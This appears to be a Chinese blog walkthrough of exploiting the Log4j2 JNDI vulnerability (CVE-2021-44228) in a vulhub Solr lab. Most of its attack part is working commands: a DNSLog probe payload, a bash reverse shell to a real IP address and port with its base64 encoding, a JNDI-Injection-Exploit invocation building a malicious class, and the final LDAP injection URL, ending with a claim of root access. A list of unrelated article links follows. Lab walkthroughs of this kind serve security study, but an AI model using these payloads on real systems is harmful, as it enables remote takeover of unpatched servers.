当前位置: 首页 > ai >正文

log4j2漏洞

1、执行以下命令启动靶场环境并在浏览器访问。

systemctl start docker
cd vulhub-master/log4j/CVE-2021-44228
docker-compose up -d

2、先在DNSLOG平台上获取⼀个域名来监控我们注入的效果

DNSLog Platform

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ivmwjk.dnslog.cn}

3、下载一个文件生成脚本工具,准备一个fantanshell,并进行base64加密。

JDNI 项目地址:github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

 bash -i >& /dev/tcp/8.141.0.63/5555 0>&1
IGJhc2ggLWkgPiYgL2Rldi90Y3AvOC4xNDEuMC42My81NTU1IDA+JjE=

4、运行下面代码,生成恶意代码类。并启动另一个终端然后开启监听。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvOC4xNDEuMC42My81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.141.0.63"

5、拿取JDK1.8并构造Payload且直接访问,可以看到网页被重定向到了我们的恶意类网址。

/solr/admin/cores?action=${jndi:ldap://8.141.0.63:1389/efojui}

6、去另外⼀个监控终端看看shell有没有弹回来,用whoami 命令查看权限,发现已经成功获取到root权限了 。

http://www.xdnf.cn/news/16035.html

相关文章:

  • 无人机光伏巡检误检率↓78%!陌讯多模态融合算法实战解析
  • Linux Debian操作系统、Deepin深度操作系统手动分区方案参考
  • 【数据结构初阶】--树和二叉树先导篇
  • C++题解 P2288 家谱(gen)
  • 2025.7.15vlan作业
  • 1553B心得总结
  • 对象\数组\Map按属性值排序迭代器
  • 达索×杰克×安托:开启服装智造“新宇宙”
  • 密码学中的概率论与统计学:从频率分析到现代密码攻击
  • 不止于“亮”:一盏智慧路灯的技术进化史——塔能科技用“落地性”定义行业标准
  • Python 程序设计讲义(9):Python 的基本数据类型——复数
  • Python-Pytorch编码习惯
  • 如何最简单、通俗地理解Python的numpy库?
  • 前端项目下载发票pdf文件要求改文件名笔记
  • [hot 100] 移动零-Python3
  • AI替代人工:浪潮中的沉浮与觉醒
  • MCP客户端架构与实施
  • 智能小e-集成配置
  • 自动化运维:从脚本到DevOps的演进
  • Java设计模式-备忘录模式
  • Leetcode力扣解题记录--第240题(矩阵搜索)
  • 基于 Qiankun 的微前端实践案例:电商平台多模块整合方案
  • java通过com进行pdf转换docx丢失
  • js面试题 高频(1-11题)
  • 观影《长安的荔枝》有感:SwiftUI 中像“荔枝转运”的关键技术及启示
  • Apache POI 介绍与使用指南
  • Day01_C++
  • ctfshow pwn40
  • CVE-2025-32463漏洞:sudo权限提升漏洞全解析
  • 网络基础17:IRF实验(H3C设备)